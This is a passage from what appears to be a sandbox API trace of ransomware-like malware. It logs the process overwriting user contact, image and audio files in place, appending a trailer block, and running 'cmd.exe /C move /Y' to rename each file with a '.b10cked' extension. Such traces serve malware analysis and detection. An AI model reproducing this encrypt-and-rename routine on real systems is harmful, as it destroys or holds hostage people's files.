hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.313] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xb [0219.313] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0219.374] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0219.374] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.374] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x4f3 [0219.374] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.374] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0219.374] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.374] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x4f3 [0219.374] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.374] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.374] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x278, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x278, lpOverlapped=0x0) returned 1 [0219.374] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.374] WriteFile (in: hFile=0x1b4, lpBuffer=0x1279be8*, nNumberOfBytesToWrite=0x278, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1279be8*, lpNumberOfBytesWritten=0x12ec1c*=0x278, lpOverlapped=0x0) returned 1 [0219.374] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-632, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x27b [0219.374] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x278, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x278, lpOverlapped=0x0) returned 1 [0219.374] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-632, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x27b [0219.374] WriteFile (in: hFile=0x1b4, lpBuffer=0x1279be8*, nNumberOfBytesToWrite=0x278, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1279be8*, lpNumberOfBytesWritten=0x12ec1c*=0x278, lpOverlapped=0x0) returned 1 [0219.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uosjfl sidvllie.contact", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0219.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uosjfl sidvllie.contact", cchWideChar=23, lpMultiByteStr=0x13286a4, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uosjfl sidvllie.contact", lpUsedDefaultChar=0x0) returned 23 [0219.378] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x4f3 [0219.378] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.378] CloseHandle (hObject=0x1b4) returned 1 [0219.379] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON") returned 0x26 [0219.379] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\") returned 0x1a [0219.379] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xf14, dwThreadId=0x8fc)) returned 1 [0219.384] CloseHandle (hObject=0x120) returned 1 [0219.384] CloseHandle (hObject=0x1b4) returned 1 [0219.384] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.384] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.384] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 2 [0219.384] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.384] ReleaseMutex (hMutex=0xf8) returned 1 [0219.384] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.384] ReleaseMutex (hMutex=0xf8) returned 1 [0219.384] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.384] ReleaseMutex (hMutex=0xf8) returned 1 [0219.384] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.384] ReleaseMutex (hMutex=0xf8) returned 1 [0219.384] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png" (normalized: "c:\\users\\eebsym5\\desktop\\59niyoz1klx-.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0219.384] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.384] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17fa9 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.385] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27617379713) returned 1 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17fa9 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17fa9 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x17fa9 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17fa9 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17fa9 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17fa9 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17fa9 [0219.385] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.386] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.386] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17fa9 [0219.386] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.386] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.386] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17fa9 [0219.386] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.386] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x17ac1 [0219.386] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0219.387] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0219.387] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.387] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x17fa9 [0219.387] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.387] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0219.387] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.387] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x17fa9 [0219.387] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.387] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.387] ReadFile (in: hFile=0x1b4, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xbfd3, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xbfd3, lpOverlapped=0x0) returned 1 [0219.388] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.388] WriteFile (in: hFile=0x1b4, lpBuffer=0x124bd78*, nNumberOfBytesToWrite=0xbfd3, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x124bd78*, lpNumberOfBytesWritten=0x12ec1c*=0xbfd3, lpOverlapped=0x0) returned 1 [0219.388] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-49107, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xbfd6 [0219.388] ReadFile (in: hFile=0x1b4, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xbfd3, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xbfd3, lpOverlapped=0x0) returned 1 [0219.388] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-49107, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xbfd6 [0219.388] WriteFile (in: hFile=0x1b4, lpBuffer=0x124bd78*, nNumberOfBytesToWrite=0xbfd3, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x124bd78*, lpNumberOfBytesWritten=0x12ec1c*=0xbfd3, lpOverlapped=0x0) returned 1 [0219.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="59nIYoZ1Klx-.png", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0219.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="59nIYoZ1Klx-.png", cchWideChar=16, lpMultiByteStr=0x13286a4, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="59nIYoZ1Klx-.png", lpUsedDefaultChar=0x0) returned 16 [0219.392] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x17fa9 [0219.392] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.393] CloseHandle (hObject=0x1b4) returned 1 [0219.394] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG") returned 0x25 [0219.394] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0219.394] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xc78, dwThreadId=0xd30)) returned 1 [0219.398] CloseHandle (hObject=0x120) returned 1 [0219.399] CloseHandle (hObject=0x1b4) returned 1 [0219.399] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.399] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.399] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 3 [0219.399] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.399] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.399] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0219.399] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.399] ReleaseMutex (hMutex=0xf8) returned 1 [0219.399] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.399] ReleaseMutex (hMutex=0xf8) returned 1 [0219.399] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.399] ReleaseMutex (hMutex=0xf8) returned 1 [0219.399] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.399] ReleaseMutex (hMutex=0xf8) returned 1 [0219.399] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav" (normalized: "c:\\users\\eebsym5\\desktop\\6uvpef.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0219.399] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.399] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b94 [0219.399] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.399] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27618849897) returned 1 [0219.399] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.399] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b94 [0219.399] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.399] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.399] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b94 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x6b94 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b94 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b94 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, 